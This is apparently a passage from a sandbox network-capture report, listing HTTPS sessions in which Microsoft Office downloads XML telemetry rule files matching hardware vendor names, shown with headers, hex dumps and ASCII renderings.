                                                                                                                                                                                    2024-11-29 18:49:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    21192.168.2.64973013.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:24 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:24 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                                                                                    x-ms-request-id: 6bbb397f-a01e-0002-2907-415074000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184924Z-174f7845968pght8hC1EWRyvxg00000003kg000000000ahv
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    22192.168.2.64973113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:24 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:24 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                    x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184924Z-174f7845968ljs8phC1EWRe6en000000102g00000000k3cs
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    23192.168.2.64973213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:24 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:24 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                                                                                    x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184924Z-174f7845968px8v7hC1EWR08ng00000010eg00000000ptf0
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    24192.168.2.64972113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:24 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:25 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                                                                                    x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184925Z-174f7845968px8v7hC1EWR08ng00000010kg00000000axp6
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:25 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    25192.168.2.64973413.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:26 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:26 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                                                                                    x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184926Z-174f7845968px8v7hC1EWR08ng00000010m0000000009ee4
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    26192.168.2.64973613.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:26 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:26 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                    x-ms-request-id: 9a251cba-f01e-0052-300b-429224000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184926Z-174f7845968cpnpfhC1EWR3afc0000000zzg0000000077ya
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    27192.168.2.64973513.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:26 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:26 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                                                                                    x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184926Z-174f78459685m244hC1EWRgp2c000000104g00000000bsa0
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:26 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    28192.168.2.64973713.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:26 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:26 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                    x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184926Z-174f7845968px8v7hC1EWR08ng00000010kg00000000axr0
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:26 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    29192.168.2.64973913.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:27 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:27 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                    x-ms-request-id: 44a27185-d01e-0028-1a07-427896000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184927Z-174f7845968psccphC1EWRuz9s00000010fg00000000ms97
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:27 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    30192.168.2.64974013.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:28 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:28 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
